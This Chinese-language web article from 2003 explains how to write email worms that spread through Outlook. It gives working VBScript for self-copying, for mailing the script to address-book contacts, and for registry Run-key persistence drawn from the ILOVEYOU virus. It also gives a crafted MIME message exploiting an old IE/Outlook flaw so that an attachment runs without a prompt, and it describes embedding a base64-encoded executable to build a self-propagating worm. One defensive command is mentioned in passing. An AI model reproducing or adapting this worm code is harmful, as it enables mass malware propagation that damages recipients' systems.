登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
  立华软件园 - 安全技术中心 - 技术文档 - 黑客编程 技术文章 | 相关下载 | 电子图书 | 攻防录像 | 安全网站 | 在线论坛 | QQ群组 | 搜索   
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
 其他安全技术资源
  · 攻防演示动画
  · 电子图书
  · QQ群组讨论区
  · 其他网站资源
最新招聘信息

如何利用OutLook漏洞编写病毒脚本
发表日期:2003-10-30作者:coolweis[] 出处:  

  据称目前已经发现唯一不能通过OutLook传播的病毒口蹄疫已经被发现,看来微软也可以得以一阵子了。开个玩笑,OutLook在传播病毒上真是臭名昭著,像iloveyou,梅莉莎等等产生过很大破坏力的病毒都是通过OutLook传播的。其根本原因就是OutLook的人性化,与脚本的高度集成,复杂性等等,正是由于这些原因导致了病毒的传播。

  下面我们看一下OutLook传播病毒的机理:

  

  首先看看病毒的几大特征:自我复制性,传播性,潜伏性。我们收先看看自我复制性。病毒要向传播必须将自身复制借由其他邮件或本身发送出去,OutLook传播的病毒基本上都是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。

  

  Set so=CreateObject("Scripting.FileSystemObject")

  so.GetFile(WScript.ScriptFullName).Copy("C:\dateiname.vbs")

  就是这么两行就可以将自身复制到c盘根目录下dateiname.vbs这个文件。第一行是创建一个文件系统对象,第二行前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到c盘根目录下dateiname.vbs这个文件。这就是大多数利用VBscript编写的病毒的一个特点。从这里可以看出,禁止了FileSystemObject这个对象就可以很有效的控制这种病毒的传播。下面的这条命令可以禁止文件系统对象。

  

  regsvr32 scrrun.dll /u

  

  我们再看看传播性。病毒需要传播,电子邮件病毒的传播无疑是通过电子邮件传播的。对于OutLook来说地址簿的功能相当不错,可是也给病毒的传播打开了方便之门。几乎所有通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。看看如下的代码:

  

  Set ol=CreateObject("Outlook.Application")

  On Error Resume Next

  For x=1 To 50

  Set Mail=ol.CreateItem(0)

  Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

  Mail.Subject="Betreff der E-Mail"

  Mail.Body="Text der E-Mail"

  Mail.Attachments.Add("C:\dateiname.vbs")

  Mail.Send

  Next

  ol.Quit

  这一小段代码的功能是向地址簿中的前50个用户发送电子邮件,并将脚本自己作为附件。第一行是创建一个Outlook的对象。下面是一个循环,在循环中不断地向地址簿中的电子邮件地址发送内容相同的信件。

  

  至于潜伏,则多数是修改注册表等信息以判断各种条件及取消一些限制。比如下面从Iloveyou病毒中取出的部分代码:

  

  On Error Resume Next

  dim wscr,rr

  set wscr=CreateObject("WScript.Shell")

  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")

  if (rr>=1) then

  wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

  end if

  很明显是调整脚本语言的超是设置。下面的一段代码则是修改注册表,使得每次系统启动自动执行脚本:

  

  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"

  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

  

  其中MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副本。

  ILoveYou病毒还做了一些其它的修改。

  

  从上面可以看出其实写一个通过OutLook传播的电子邮件病毒很简单。但是作为附件传播,这种传播的效率可能就会打些折扣。下面的一种方法是根据最新的IE的漏洞利用的。下面是这个漏洞的一些情况:

  

From: "xxxxx"

Subject: mail

Date: Thu, 2 Nov 2000 13:27:33 +0100

MIME-Version: 1.0

Content-Type: multipart/related;

  type="multipart/alternative";

  boundary="1"

X-Priority: 3

X-MSMail-Priority: Normal

--1

Content-Type: multipart/alternative;

  boundary="2"

--2

Content-Type: text/html;

  charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

<HTML>

<HEAD>

</HEAD>

<BODY bgColor=3D#ffffff>

<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

I will create the file C:\deleteme.txt<BR>

</BODY>

</HTML>

--2--

--1

Content-Type: audio/x-wav;

  name="hello.vbs"

Content-Transfer-Encoding: quoted-printable

Content-ID: <THE-CID>

set objFileSystem =3D CreateObject("Scripting.FileSystemObject")

set objOutputFile =3D objFileSystem.CreateTextFile("C:\deleteme.txt", 1)

objOutputFile.writeline("You can delete this file.")

objOutputFile.close

msgbox "I have created the file : c:\deleteme.txt"

--1

  上面的这个程序的例子是表明当双击附件的时候OutLook是不会提示你安全信息的,它是直接执行的。这仅仅是将整个上面这些作为附件发送的情况。其实这个文件直接发送给对方,对方只要将焦点移到这一主题上就会执行这个脚本。因此这一漏洞将更加有效的传播电子邮件病毒。产生上面这个漏洞的原因大概是采用HTML发送方式其背景音乐文件没有作检查,导致脚本,应用程序等被执行。采用不同的编码就可以将脚本,命令行命令,可执行文件等内嵌在邮件中。注意上面的一行:

  

  name="hello.vbs"

    

  这个文件名可以任意命名,如果是脚本则需要vbs扩展名,如果是命令行命令则应该是bat或cmd结尾。如果是脚本或这种文本方式的命令,则编码方式应为:quoted-printable

  

  Content-Transfer-Encoding: quoted-printable

  

  如果是应用程序则文件名应该改为exe扩展名:

  

  name="hello.exe"

    

  编码方式应该改为uuMime(base64)编码:

  

  Content-Transfer-Encoding: quoted-printable

  

  然后将应用程序进行base64编码插入到:

  

  Content-ID: <THE-CID>

  --1

  

  之间。这样就构造好了一封信。发送的时候可以选择quack写的perl程序,也可以采用我写的windows上的傻瓜程序。

  

  根据上面的经验,可以写一个应用程序,这个应用程序就是病毒,它首先对自身进行base64编码,然后再将这个编码嵌入到上面这个邮件中,然后向地址簿中的电子邮件地址发送这个电子邮件。收到这个电子邮件的用户当焦点再这个主题上时这个应用程序就会立刻被执行而没有任何提示,执行的结果是和上面一样,先将自身编码,在插入到邮件,在向地址簿中的电子邮件地址发送。如此传播。问题是应用程序对地址簿的读取没有脚本那么容易,而且应用程序的大小也要比脚本大很多。采用脚本编写的话则在发送邮件中比较难于处理成一点即运行的方式。也许是本人对于脚本语言知之甚少的缘故吧。另外在处理复制中也有些困难。因为再另一端执行时脚文件值包含这些脚本命令,而不包含上面的额外的东西。所以处理起来也比较困难。

  

  以上是我的一点点看法,有些地方可能不对,还请各位大侠批评指正。

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 如何利用OutLook漏洞编写病毒脚本

 ■ [欢迎对本文发表评论]
用  户:  匿名发出:
您要为您所发的言论的后果负责,故请各位遵纪守法并注意语言文明。

最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接  
Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.00196